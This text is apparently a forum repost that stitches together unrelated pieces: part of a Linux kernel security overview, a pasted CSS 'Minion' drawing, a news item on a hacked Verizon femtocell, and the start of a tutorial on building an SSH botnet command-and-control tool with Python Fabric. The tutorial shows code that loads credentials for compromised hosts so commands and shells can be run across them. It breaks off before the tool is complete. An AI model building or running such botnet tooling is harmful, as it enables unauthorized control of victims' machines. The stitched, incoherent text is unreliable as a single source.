All security-relevant information is safely passed to the LSM, avoiding race conditions, and the LSM may deny the operation. This is similar to the Netfilter hook-based API, although applied to the general kernel. The LSM API allows different security models to be plugged into the kernel—typically access control frameworks. To ensure compatibility with existing applications, the LSM hooks are placed so that the Unix DAC checks are performed first, and only if they succeed is LSM code invoked. The following LSMs have been incorporated into the mainline Linux kernel:

SELinux

Security Enhanced Linux (SELinux) is an implementation of fine-grained Mandatory Access Control (MAC) designed to meet a wide range of security requirements, from general purpose use through to government and military systems which manage classified information. MAC security differs from DAC in that the security policy is administered centrally, and users do not administer policy for their own resources. This helps contain attacks which exploit userland software bugs and misconfiguration.

In SELinux, all objects on the system, such as files and processes, are assigned security labels. All security-relevant interactions between entities on the system are hooked by LSM and passed to the SELinux module, which consults its security policy to determine whether the operation should continue. The SELinux security policy is loaded from userland, and may be modified to meet a range of different security goals. Many previous MAC schemes had fixed policies, which limited their application to general purpose computing.

SELinux is implemented as a standard feature in Fedora-based distributions, and is widely deployed.

Smack

The Smack LSM was designed to provide a simple form of MAC security, in response to the relative complexity of SELinux. It's also implemented as a label-based scheme with a customizable policy.
Smack is part of the Tizen security architecture and has seen adoption generally in the embedded space.

AppArmor

AppArmor is a MAC scheme for confining applications, and was designed to be simple to manage. Policy is configured as application profiles using familiar Unix-style abstractions such as pathnames. It is fundamentally different from SELinux and Smack in that, instead of direct labeling of objects, security policy is applied to pathnames. AppArmor also features a learning mode, where the security behavior of an application is observed and converted automatically into a security profile.

AppArmor is shipped with Ubuntu and openSUSE, and is also widely deployed.

TOMOYO

The TOMOYO module is another MAC scheme which implements path-based security rather than object labeling. It's also aimed at simplicity, utilizing a learning mode similar to AppArmor's, where the behavior of the system is observed for the purpose of generating security policy.

What's different about TOMOYO is that what's recorded are trees of process invocation, described as "domains". For example, when the system boots, starting from init, a series of tasks are invoked which lead to a logged-in user running a shell, and ultimately executing a command, say ping. This particular chain of tasks is recorded as a valid domain for the execution of that application, and invocations which have not been recorded are denied.

TOMOYO is intended for end users rather than system administrators, although it has not yet seen any appreciable adoption.

Yama

The Yama LSM is not an access control scheme like those described above. It's where miscellaneous DAC security enhancements are collected, typically from external projects such as grsecurity. Currently, enhanced restrictions on ptrace are implemented in Yama, and the module may be stacked with other LSMs in a similar manner to the capabilities module.
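Yama's ptrace restriction is visible from userland via the /proc/sys/kernel/yama/ptrace_scope sysctl. A small Python sketch to report it (the function name is mine; the scope meanings follow the kernel's Yama documentation, and the file is absent when Yama isn't enabled):

```python
YAMA_SCOPE = "/proc/sys/kernel/yama/ptrace_scope"

# Documented meanings of the Yama ptrace scopes.
MEANINGS = {
    0: "classic ptrace permissions",
    1: "restricted ptrace (descendants only)",
    2: "admin-only attach (requires CAP_SYS_PTRACE)",
    3: "no ptrace attach at all",
}

def yama_ptrace_scope():
    """Return the current Yama ptrace scope, or None if Yama is not enabled."""
    try:
        with open(YAMA_SCOPE) as f:
            return int(f.read().strip())
    except (FileNotFoundError, ValueError):
        return None

if __name__ == "__main__":
    scope = yama_ptrace_scope()
    if scope is None:
        print("Yama is not enabled on this kernel")
    else:
        print("ptrace_scope =", scope, "-", MEANINGS.get(scope, "unknown"))
```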
Audit

The Linux kernel features a comprehensive audit subsystem, which was designed to meet government certification requirements, but also actually turns out to be useful. LSMs and other security components utilize the kernel Audit API. The userland components are extensible and highly configurable. Audit logs are useful for analyzing system behavior, and may help detect attempts at compromising the system.

Seccomp

Secure computing mode (seccomp) is a mechanism which restricts the system calls a process may make. The idea is to reduce the attack surface of the kernel by preventing applications from invoking system calls they don't need. The system call API is a wide gateway to the kernel, and as with all code, there have been, and are likely to be, bugs present somewhere. Given the privileged nature of the kernel, bugs in system calls are potential avenues of attack. If an application only needs a limited number of system calls, then restricting it to invoking only those calls reduces the overall risk of a successful attack.

The original seccomp code, also known as "mode 1", provided access to only four system calls: read, write, exit, and sigreturn. These are the minimum required for a useful application, and this was intended to be used to run untrusted code on otherwise idle systems. A recent update to the code allows arbitrary specification of which system calls are permitted for a process, and integration with audit logging. This "mode 2" seccomp was developed for use as part of Google Chrome OS.

Integrity Management

The kernel's integrity management subsystem may be used to maintain the integrity of files on the system. The Integrity Measurement Architecture (IMA) component performs runtime integrity measurements of files using cryptographic hashes, comparing them with a list of valid hashes. The list itself may be verified via an aggregate hash stored in the TPM.
Measurements performed by IMA may be logged via the audit subsystem, and also used for remote attestation, where an external system verifies their correctness.

IMA may also be used for local integrity enforcement via the Appraisal extension. Valid measured hashes of files are stored as extended attributes with the files, and subsequently checked on access. These extended attributes (as well as other security-related extended attributes) are protected against offline attack by the Extended Verification Module (EVM) component, ideally in conjunction with the TPM. If a file has been modified, IMA may be configured via policy to deny access to it. The Digital Signature extension allows IMA to verify the authenticity of files, in addition to their integrity, by checking RSA-signed measurement hashes.

A simpler approach to integrity management is the dm-verity module. This is a device mapper target which manages file integrity at the block level. It's intended to be used as part of a verified boot process, where an appropriately authorized caller brings a device online, say, a trusted partition containing kernel modules to be loaded later. The integrity of those modules will be transparently verified block by block as they are read from disk.

Hardening and Platform Security

Hardening techniques have been applied at various levels, including in the build chain and in software, to help reduce the risk of system compromise. Address Space Layout Randomization (ASLR) places various memory areas of a userland executable in random locations, which helps prevent certain classes of attack. This was adapted from the external PaX/grsecurity projects, along with several other software-based hardening features.

The Linux kernel also supports hardware security features where available, such as NX, VT-d, the TPM, TXT, and SMAP, along with cryptographic processing as previously mentioned.
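ASLR's effect is easy to observe from userland: the same program typically sees its stack mapped at a different address on each run. A small Python sketch of the idea (Linux-only, reading /proc/self/maps in freshly launched child interpreters; the helper name is mine):

```python
import subprocess
import sys

# Child program: print the start address of this process's stack mapping.
CHILD = (
    'f = open("/proc/self/maps");'
    'print(next(int(l.split("-")[0], 16) for l in f if "[stack]" in l))'
)

def stack_base():
    """Launch a fresh interpreter and return its stack base address."""
    out = subprocess.check_output([sys.executable, "-c", CHILD], text=True)
    return int(out)

if __name__ == "__main__":
    a, b = stack_base(), stack_base()
    print(hex(a), hex(b))
    # With ASLR enabled (kernel.randomize_va_space != 0) these normally differ.
    print("stack base differs between runs:", a != b)
```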
Summary

We've covered, at a very high level, how Linux kernel security has evolved from its Unix roots, adapting to ever-changing security requirements. These requirements have been driven both by external changes, such as the continued growth of the Internet and the increasing value of information stored online, and by the increasing scope of the Linux user base. Ensuring that the security features of the Linux kernel continue to meet such a wide variety of requirements in a changing landscape is an ongoing and challenging process.

James Morris is the Linux kernel security subsystem maintainer. He is the author of sVirt (virtualization security) and multi-category security, and the kernel cryptographic API, and has contributed to the SELinux, Netfilter and IPsec projects. He works for Oracle as manager of the mainline Linux kernel development team, from his base in Sydney, Australia. Follow James on https://blogs.oracle.com/linuxkernel/.

Sursa: https://www.linux.com/learn/docs/727873-overview-of-linux-kernel-security-features
-
[h=1]Pure CSS Minion (Superman Mode)[/h] <!-- Pure CSS Minion, just a little bit of js to toggle the Superman class. @author Ezequiel Calvo <ezecafre@gmail.com> Follow me @EzequielCalvo Hashtag #CSSDrawing #Minion Nice to have: - Wave on the coat. - Animation when changing the clothes. --> <section class="content" id="target"> <ul class="hair hair-left"> <li></li> <li></li> <li></li> <li></li> </ul> <ul class="hair hair-right"> <li></li> <li></li> <li></li> <li></li> </ul> <div class="body"> <div class="glasses"> <span class="band band-left"></span> <span class="band band-right"></span> <div class="glass"> <div class="iris iris-left"> <div class="shine"></div> </div> </div> <div class="glass"> <div class="iris iris-right"> <div class="shine"></div> </div> </div> </div> </div> <div class="mouth"> <ul class="teeth"> <li></li> <li></li> <li></li> <li></li> </ul> </div> <div class="pants"> <div class="belt belt-left"></div> <div class="belt belt-right"></div> </div> <div class="super-pants"> <div class="symbol"> <div class="s-first-part"></div> <div class="s-second-part"></div> </div> </div> <div class="arm arm-left"> <div class="hand"> <ul class="fingers fingers-left"> <li class="finger"></li> <li class="finger"></li> <li class="finger"></li> </ul> </div> </div> <div class="arm arm-right"> <div class="hand"> <ul class="fingers fingers-right"> <li class="finger"></li> <li class="finger"></li> </ul> </div> </div> <div class="legs"> <div class="leg"></div> <div class="leg"></div> </div> <div class="shoes shoes-left"></div> <div class="shoes shoes-right"></div> <div class="coat"></div> </section> <button class="btn">Superman Mode ON!</button> <script class="cssdeck" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script> /** * Minion Pure CSS * * @author Ezequiel Calvo <ezecafre@gmail.com> * Follow me @EzequielCalvo * Hashtag #CSSDrawing #Minion */ .btn { position: absolute; top: 10px; left: 10px; border: 0; padding: 5px 10px; border: 1px solid 
#c0392b; border-radius: 2px; font-size: 0.95em; background: #e74c3c; color: #EEE; font-weight: 60; } .btn:hover { background: #c0392b; border: 1px solid #e74c3c; } .content { margin: 40px; } .body { width: 180px; height: 325px; margin: 0 auto; position:relative; z-index: 1; border-radius: 85px 85px 0 0; box-shadow: inset 0 -10px 10px 3px #cc9e24; background: #fcda6d; background: -webkit-gradient(linear, right top, left top,color-stop(61%, #fcda6d), color-stop(100%, #cc9e24)); background: -webkit-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: -moz-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: -ms-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: -o-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: linear-gradient(to right, #fcda6d 67%,#cc9e24 100%); } .hair { padding: 0; } .hair li { position: absolute; top: -1px; left: 50%; z-index: 2; list-style: none; height: 45px; width: 5px; border: 2px solid #555; border-radius: 140%; margin: 10px; } .hair-left li { border-left: none; border-bottom: none; } .hair-right li { border-right: none; border-bottom: none; } .hair-left li:nth-child(1) { margin: 20px 0 0 -60px; transform: rotate(-20deg); } .hair-left li:nth-child(2) { height: 30px; margin: 45px 0 0 -75px; transform: rotate(-50deg); } .hair-left li:nth-child(3) { height: 36px; margin: 15px 0 0 -35px; transform: rotate(-10deg); } .hair-left li:nth-child(4) { height: 26px; margin: 35px 0 0 -13px; transform: rotate(-20deg); } .hair-right li:nth-child(1) { margin: 23px 0 0 60px; transform: rotate(20deg); } .hair-right li:nth-child(2) { height: 30px; margin: 45px 0 0 75px; transform: rotate(50deg); } .hair-right li:nth-child(3) { height: 36px; margin: 15px 0 0 35px; transform: rotate(10deg); } .hair-right li:nth-child(4) { height: 34px; margin: 20px 0 0 13px; transform: rotate(20deg); } .band, .band-right:before, .band-left:before { height: 10px; width: 17px; position: relative; display: block; border-radius: 3px; 
background: #222; box-shadow: 0 1px 5px 0px #222; } .band-right { top: 89px; left: 168px; transform: rotate(5deg); } .band-left { top: 96px; left: -5px; transform: rotate(-5deg); } .band-left:before { content: ""; display: block; top: 10px; background: #333; } .band-right:before { content: ""; display: block; top: 10px; background: #333; } .glasses { width: 180px; } .glass { width: 85px; height: 85px; float: left; margin: 40px 0 0 10px; border-radius: 110px; background: linear-gradient(#989697, #696371); box-shadow: 4px 6px 9px 3px #c48e00; box-shadow: inset 0 -2px 2px #5d4b3d , inset -1px 1px 3px 1px #fff , 1px 5px 7px -1px #c48e00; } .glass:before { content: ""; display: block; width: 65px; height: 65px; border-radius: 70px; position:relative; top: 10px; left: 10px; background: #fcda6d; box-shadow: inset 0 2px 4px 1px #5d4b3d ; } .glass:after { width: 63px; height:50px; content: ""; display: block; border-radius: 70px; position: relative; top: -73px; left: 11px; background: #FFF; /* Old browsers */ background: -webkit-gradient(linear,left bottom,right top,color-stop(0.54, #FFF), color-stop(0.91, #AAA)); background: -webkit-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: -moz-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: -ms-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: -o-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: linear-gradient(to left bottom, #FFF 53%,#AAA 91%); -webkit-animation: eyes 4s infinite step-start 0s; -moz-animation: eyes 4s infinite step-start 0s; -ms-animation: eyes 4s infinite step-start 0s; -o-animation: eyes 4s infinite step-start 0s; animation: eyes 4s infinite step-start 0s; } .glass:last-child { margin-left: -9px; } .iris { width: 23px; height: 23px; position: relative; top: -30px; z-index: 10; border: 1px solid #222; border-radius: 50%; background: #000; box-shadow: inset -2px -2px 5px 2px #222, inset 2px 2px 1px 2px #7e4d49; background: 
-webkit-radial-gradient(center, ellipse cover, #000 25%, #6f4a2d 34%, #c79067 44%, #6f4a2d 50%); background: -moz-radial-gradient(center, ellipse cover, #000 25%, #6f4a2d 34%, #c79067 44%, #6f4a2d 50%); -webkit-animation: iris 4s infinite step-start 0s; -moz-animation: iris 4s infinite step-start 0s; -ms-animation: iris 4s infinite step-start 0s; -o-animation: iris 4s infinite step-start 0s; animation: iris 4s infinite step-start 0s; } .iris-left { left: 38px; } .iris-right { left: 23px; } .iris:before { width: 5px; height: 5px; content: ""; display: block; position: relative; z-index: 11; top: 4px; left: 4px; border-radius: 50%; box-shadow: 0 0 5px 2px #FFF; background: #FFF; } .mouth { width: 70px; height: 30px; margin: 0 auto; position: relative; z-index: 2; top: -155px; border-bottom-left-radius: 50px; border-bottom-right-radius: 50px; border: 0; overflow: hidden; background: #222; background: -webkit-gradient(linear, 0 0, 0 100%, from(#222), color-stop(0.79, #bd736a)); background: -webkit-linear-gradient(#222, #bd736a 99%); background: -moz-linear-gradient(#222, #bd736a 99%); background: -o-linear-gradient(#222, #bd736a 99%); background: linear-gradient(#222, #bd736a 99%); } .mouth:after { content: ""; display:block; position: relative; top: -50px; left: -21px; width: 120px; height: 40px; border-radius: 50%; background: #FCDA6D; box-shadow: inset 0 0 3px 1px #957b43; /*-webkit-animation: mouth 7s infinite step-start 1s; -moz-animation: mouth 7s infinite step-start 1s; -ms-animation: mouth 7s infinite step-start 1s; -o-animation: mouth 7s infinite step-start 1s; animation: mouth 7s infinite step-start 1s;*/ } .teeth { width: 90px; position: relative; top: -19px; padding: 0 5px; } .teeth li { width: 16px; height: 15px; list-style: none; display: block; float: left; z-index: 1; border-radius: 6px; background: #ccccc2; box-shadow: inset 0 -1px 1px 1px #FFF, inset -1px 0 1px 0px #F45; } .teeth li:first-child { height: 12px; } .teeth li:last-child { height: 12px; } 
.pants { width: 180px; height: 50px; margin: 0 auto; position: relative; z-index: 2; top: -58px; border-radius: 2px 2px 25px 25px; background: #146696; background: -webkit-linear-gradient(left, #146696 67%,#115278 100%); border: 2px dotted #1f4362; box-shadow: inset 1px -10px 10px 2px #1a364d, 0 0 2px 2px #2e5f88; } .pants:before { width: 120px; height: 60px; content: ""; display: block; position: relative; top: -50px; left: 40px; border: 2px dotted #1f4362; border-bottom: 0; border-radius: 10px; background: #146696; background-image: -webkit-gradient(linear, left, color-stop(67%, #146696), color-stop(100%, #115278)); background-image: -webkit-linear-gradient(left, #146696 67%, #115278 100%); background-image: -moz-linear-gradient(left, #146696 67%, #115278 100%); background-image: -ms-linear-gradient(left, #146696 67%, #115278 100%); background-image: -o-linear-gradient(left, #146696 67%, #115278 100%); background-image: linear-gradient(left, #146696 67%, #115278 100%); box-shadow: 0 -3px 2px 2px #2e5f88; } .belt { width: 15px; height: 75px; background: #146696; box-shadow: inset 1px 10px 10px 2px #1a364d; position: relative; } .belt:after { content: ""; display: block; width: 10px; height: 10px; border-radius: 50%; background: #223333; position: absolute; bottom: 5px; left: 2px; } .belt-left { top: -160px; left: 18px; border: 2px dotted #1f4362; border-top-left-radius: 25px; -webkit-transform: rotate(-55deg); -moz-transform: rotate(-55deg); -ms-transform: rotate(-55deg); -o-transform: rotate(-55deg); transform: rotate(-55deg); } .belt-right { height: 60px; top: -230px; left: 158px; border: 2px dotted #1F4362; border-top-right-radius: 25px; -webkit-transform: rotate(35deg); -moz-transform: rotate(35deg); -ms-transform: rotate(35deg); -o-transform: rotate(35deg); transform: rotate(35deg); } .arm { width: 20px; height: 100px; margin: 0 auto; position: relative; z-index: 2; border-radius: 10px; background: #FFD449; } .arm-right { z-index: 1; height: 115px; top: 
-410px; left: 95px; box-shadow: inset 0 10px 10px 3px #D5970E; -webkit-transform: rotate(-10deg); -moz-transform: rotate(-10deg); -ms-transform: rotate(-10deg); -o-transform: rotate(-10deg); transform: rotate(-10deg); } .arm-left { top: -290px; left: -104px; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .arm-left:before { content: ""; display: block; width: 21px; height: 40px; position: relative; top: -18px; border-radius: 50%; background: #FFD449; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .arm-left:after, .arm-right:after { content: ""; display: block; width: 22px; height: 20px; position: relative; border-radius: 6px; background: #FFD449; } .arm-left:after { z-index: 3; top: -14px; -webkit-transform: rotate(-15deg); -moz-transform: rotate(-15deg); -ms-transform: rotate(-15deg); -o-transform: rotate(-15deg); transform: rotate(-15deg); } .arm-right:after { z-index: 3; top: 55px; left: -2px; box-shadow: inset -3px -6px 5px 1px #D5970E; -webkit-transform: rotate(15deg); -moz-transform: rotate(15deg); -ms-transform: rotate(15deg); -o-transform: rotate(15deg); transform: rotate(15deg); } .hand { height: 40px; width: 35px; position: relative; z-index: 1; top: 35px; left: 0; border-radius: 30%; box-shadow: inset 0 -2px 10px 5px #222; background: #333; -webkit-transform: rotate(-20deg); -moz-transform: rotate(-20deg); -ms-transform: rotate(-20deg); -o-transform: rotate(-20deg); transform: rotate(-20deg); } .hand:before { content: ""; display: block; position: relative; z-index: 1; top: -5px; left:-3px; width: 30px; height: 9px; background: #111; border: 5px solid #222; border-radius: 50%; box-shadow: 0 4px 1px 0 #444; } .hand:after { content: ""; display: block; position: relative; z-index: 1; top: -100px; left: 1px; width: 34px; height: 30px; background: #333; 
border-radius: 50%; box-shadow: inset 0 -10px 10px 5px #222; -webkit-transform: rotate(5deg); -moz-transform: rotate(5deg); -ms-transform: rotate(5deg); -o-transform: rotate(5deg); transform: rotate(5deg); } .fingers { list-style: none; position: relative; top: 10px; } .fingers li { border-radius: 10px; position: relative; background: #333; box-shadow: inset 0 -10px 10px 5px #222; } .fingers-right li:nth-child(1) { z-index: 2; width: 20px; height: 35px; top: -20px; left: -50px; border-right: 2px solid #000; -webkit-transform: rotate(50deg); -moz-transform: rotate(50deg); -ms-transform: rotate(50deg); -o-transform: rotate(50deg); transform: rotate(50deg); } .fingers-right li:nth-child(2) { z-index: 1; width: 20px; height: 30px; top: -50px; left: -40px; border-right: 2px solid #000; -webkit-transform: rotate(40deg); -moz-transform: rotate(40deg); -ms-transform: rotate(40deg); -o-transform: rotate(40deg); transform: rotate(40deg); } .fingers-left li:nth-child(1) { z-index: 2; width: 25px; height: 25px; top: -17px; left: -43px; border-right: 2px solid #000; border-radius: 30px; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .fingers-left li:nth-child(2) { z-index: 1; width: 20px; height: 24px; top: -50px; left: -18px; border-right: 2px solid #000; -webkit-transform: rotate(-30deg); -moz-transform: rotate(-30deg); -ms-transform: rotate(-30deg); -o-transform: rotate(-30deg); transform: rotate(-30deg); } .fingers-left li:nth-child(3) { z-index: 1; width: 23px; height: 30px; top: -63px; left: -33px; border-right: 2px solid #000; -webkit-transform: rotate(0deg); -moz-transform: rotate(0deg); -ms-transform: rotate(0deg); -o-transform: rotate(0deg); transform: rotate(0deg); } .arm-right .hand { top: 105px; left: -15px; transform: rotate(20deg); -webkit-transform: rotate(20deg); -moz-transform: rotate(20deg); -ms-transform: rotate(20deg); -o-transform: rotate(20deg); 
transform: rotate(20deg); } .arm-left .hand:after { height: 30px; width: 30px; left: 3px; top: -110px; } .legs { width: 120px; margin: 0 auto; } .leg { z-index: 1; width: 40px; height: 35px; display: inline-block; background: #146696; border-radius: 30%; position: relative; box-shadow: inset 1px 10px 10px 2px #222; top: -410px; left: 20px; } .shoes { z-index: 1; background: #222; margin: 0 auto; position: relative; box-shadow: inset -2px 1px 10px 1px #666; } .shoes-left { z-index: 0; width: 40px; height: 30px; top: -425px; left: -20px; border-radius: 20px; box-shadow: inset 0 -3px 3px 1px #999; } .shoes-right { z-index: 0; width: 50px; height: 20px; top: -452px; left: 30px; border-radius: 20px; border-right: 1px solid #000; box-shadow: inset -1px 1px 5px 1px #999; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .shoes-right:after { content: ""; display: block; position: relative; width: 50px; height: 20px; top: -3px; border-bottom: 7px solid #111; border-radius: 20px; } .shoes-left:after { content: ""; display: block; position: relative; width: 40px; height: 20px; top: 5px; border-bottom: 7px solid #222; border-radius: 20px; } /* Superman Styles*/ .coat { width: 200px; height: 150px; margin: 0 auto; background: red; z-index: 0; position: relative; visibility: hidden; top: -625px; border-radius: 10px; box-shadow: inset 1px 2px 20px 4px #B32020, inset 0 -3px 20px 4px #222; left: -2px; } .superman .leg { background: #222; } .superman .coat { visibility: visible; } .superman .mouth { background: #fcda6d; } .superman .mouth:after { border-radius: 0; } .superman .arm, .superman .arm-left:after, .superman .arm-left:before, .superman .arm-right:after { background: blue; background: -webkit-linear-gradient(left, #222 67%,#115278 100%); box-shadow: inset 0 10px 10px 3px #000; } .super-pants { width: 180px; height: 130px; margin: 0 auto; position: relative; z-index: 2; top: 
-188px; overflow: hidden; border-radius: 2px 2px 25px 25px; background: blue; visibility: hidden; background: -webkit-linear-gradient(right, #222 67%,#115278 100%); background: -moz-linear-gradient(right, #222 67%,#115278 100%); box-shadow: inset -1px -10px 10px 2px #1a364d, 0 0 2px 2px #2e5f88; } .symbol { width: 100px; height: 100px; position: relative; top: -30px; left: 52px; z-index: 1; overflow: hidden; background: red; box-shadow: 1px 1px 5px 4px red, inset 0 0 6px 3px #222, inset 1px -10px 12px 1px #444, inset 4px 0 4px 1px #FFF; -webkit-transform: rotate(45deg); -moz-transform: rotate(45deg); -ms-transform: rotate(45deg); -o-transform: rotate(45deg); transform: rotate(45deg); } .s-first-part { width: 100px; height: 20px; z-index: 2; background: yellow; position: relative; border: 1px solid #000; border-radius: 20px 0 0 100px; top: 26px; left: 14px; box-shadow: inset -1px 0 10px 4px #111, 1px 1px 14px 1px #000; -webkit-transform: rotate(-45deg); -moz-transform: rotate(-45deg); -ms-transform: rotate(-45deg); -o-transform: rotate(-45deg); transform: rotate(-45deg); } .s-second-part { width: 60px; height: 20px; z-index: 2; background: yellow; position: relative; border: 1px solid #000; border-radius: 5px 20px 100px 10px; top: 55px; left: 35px; box-shadow: inset 3px 0 10px 4px #111, 1px 1px 14px 1px #000; -webkit-transform: rotate(-45deg); -moz-transform: ; -ms-transform: ; -o-transform: ; transform: ; } .superman .pants { visibility: hidden; } .superman .super-pants { visibility: visible; } /* Eyes Animation */ @-webkit-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @-moz-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @-o-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: 
inset 0 0 3px 1px #CCC; } } @-ms-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @keyframes eyes { 0%, 100% { background:#fcda6d; border: none; border-bottom: 1px solid #222; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } /* Iris Animation */ @-webkit-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @-moz-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @-o-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @-ms-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } /* Mouth Animation */ @-webkit-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @-moz-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @-o-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @-ms-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @keyframes mouth { 0%, 100% { top: 0px; } 15%, 95% { top: -35px; } } /** * Js event handler to change between Clark and Superman modes. * * @author Ezequiel Calvo <ezecafre@gmail.com> * Follow me @EzequielCalvo * Hashtag #CSSDrawing #Minion */ $('.btn').on('click', function() { $('#target').toggleClass('superman'); }); Sursa: Pure CSS Minion (Superman Mode) | CSSDeck
-
[h=1]Coedbraking…[/h] According to the Daily Mail, the UK’s NSA-equivalent (approximately), GCHQ, has said that many of its codebreakers are dyslexic. You (or those of us living in this sceptred isle (This blessed plot, this earth, this realm, this England…)) may or may not find this reassuring. It probably explains why crypto is one of my weaker areas, technically. This may well be the only time I ever link to the Daily Mail in a blog… David Harley CITP FBCS CISSP Small Blue-Green World ESET Senior Research Fellow Sursa: Coedbraking… | Dataholics: the IT addiction
-
[h=3]Hackers turn Verizon signal booster into a mobile hacking machine[/h] A group of hackers from security firm iSEC found a way to tap right into Verizon Wireless cell phones using a signal-boosting device made by Samsung for Verizon that costs about $250. They hacked Verizon's signal-boosting devices, known as femtocells or network extenders, which anyone can buy online, and turned one into a cell phone tower small enough to fit inside a backpack, capable of capturing and intercepting all calls, text messages and data sent by mobile devices within range. "This is not about how the NSA would attack ordinary people. This is about how ordinary people would attack ordinary people," said Tom Ritter, a senior consultant at iSEC. They declined to disclose how they had modified the software on the device, but they plan to give more elaborate demonstrations at various hacking conferences this year. http://www.youtube.com/watch?feature=player_embedded&v=9nEOsjjhZPg Verizon Wireless already released a Linux software update in March to fix the flaw, which prevents its network extenders from being compromised in the manner reported by Ritter and DePerry. They claimed that, with a little more work, they could have weaponized it for stealth attacks by packaging all the equipment needed for a surveillance operation into a backpack that could be dropped near a target they wanted to monitor. This particular femtocell taps into Verizon phones. However, they believe it might be possible to find a similar problem with femtocells that work with other providers. Sursa: Hackers turn Verizon signal booster into a mobile hacking machine - The Hacker News
-
[h=3]Building an SSH Botnet C&C Using Python and Fabric[/h]

Introduction

Disclaimer: I suppose it would be wise to put a disclaimer on this post. Compromising hosts to create a botnet without authorization is illegal, and not encouraged in any way. This post simply aims to show security professionals how attackers could use standard IT automation tools for a purpose for which they were not originally intended. Therefore, the content is meant for educational purposes only.

System administrators often need to perform the same (or similar) tasks across a multitude of hosts. Doing this manually is unreasonable, so solutions have been created to help automate the process. While these solutions can be a life-saver to many, let's look at them in a different light. In this post, we'll explore how easy it would be for an attacker to use one of these solutions, a popular Python library called Fabric, to quickly create a command and control (C&C) application that can manage a multitude of infected hosts over SSH.

Fabric Basics

Fabric's documentation describes it as a "library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks." Using the popular Paramiko Python library to manage its SSH connections, Fabric provides programmers with an easy-to-use API to run sequential or parallel tasks across many machines. Before building a C&C application, let's explore some of the basics of Fabric (a full tutorial can be found here).

The "fab" Command-line Tool

While we won't be using it much in this post, I don't feel a post about Fabric would be complete without mentioning the "fab" tool. Usually, sysadmins only need to set up predefined commands (called "tasks") to be run on multiple hosts.
With this being the case, the standard application of Fabric is as follows:

- Create a "fabfile" (more on this later)
- Use the fab tool to execute tasks defined in the fabfile on selected hosts

While this allows us to run a predefined set of commands, this isn't helpful if we want an interactive framework. The solution to this is found in the Fabric documentation:

The fab tool simply imports your fabfile and executes the function or functions you instruct it to. There’s nothing magic about it – anything you can do in a normal Python script can be done in a fabfile!

This means that we can execute any task in our fabfile without needing to go through the fab command-line tool. This is helpful, since we can create an interactive management wrapper to perform tasks on a dynamic list of hosts as we choose. But first, we need to address the obvious: what is a fabfile?

Fabfiles

In a nutshell, a fabfile is simply a file containing functions and commands that incorporate Fabric's API. These functions can be found in the fabric.api namespace. It's important to remember our note above which says that a fabfile is just Python - nothing special. So, with that brief intro, let's dive into the Fabric API to see how we can use the provided functions to build an SSH C&C:

Building the C&C

Let's assume an attacker managed to compromise numerous hosts, either using SSH or via other means, and now has SSH access to them. Let's also assume that credentials to these hosts are stored in a file with the following format:

username@hostname:port password

The example for this post will be as follows:

root@192.168.56.101:22 toor
root@192.168.56.102:22 toor

It is important to note that Fabric tries to automatically detect the type of authentication needed (password, or passphrase for a private key). Therefore, if the passwords stored in the credentials file are for private keys, they should work seamlessly. Now that we have our credentials, let's consider what functions we will create.
For the sake of this post, let's implement the following:

- Status check to see which hosts are running
- Run a supplied command on multiple selected hosts
- Create an interactive shell session with a host

To start, we will import all members of the fabric.api namespace:

from fabric.api import *

Next, we will use two of Fabric's environment variables, env.hosts and env.passwords, to manage our host connections. env.hosts is a list we can use to manage our master host list, and env.passwords is a mapping between host strings and passwords to be used. This prevents us from having to enter the passwords upon each new connection. Let's read all the hosts and passwords from the credentials file and put them into the variables:

for line in open('creds.txt','r').readlines():
    host, passw = line.split()
    env.hosts.append(host)
    env.passwords[host] = passw

Now for the fun part - running commands. There are 6 types of command-execution functions that we should consider:

- run(command) - Run a shell command on a remote host.
- sudo(command) - Run a shell command on a remote host, with superuser privileges.
- local(command) - Run a command on the local system.
- open_shell() - Opens an interactive shell on the remote system.
- get(remote_path, local_path) - Download one or more files from a remote host.
- put(local_path, remote_path) - Upload one or more files to a remote host.

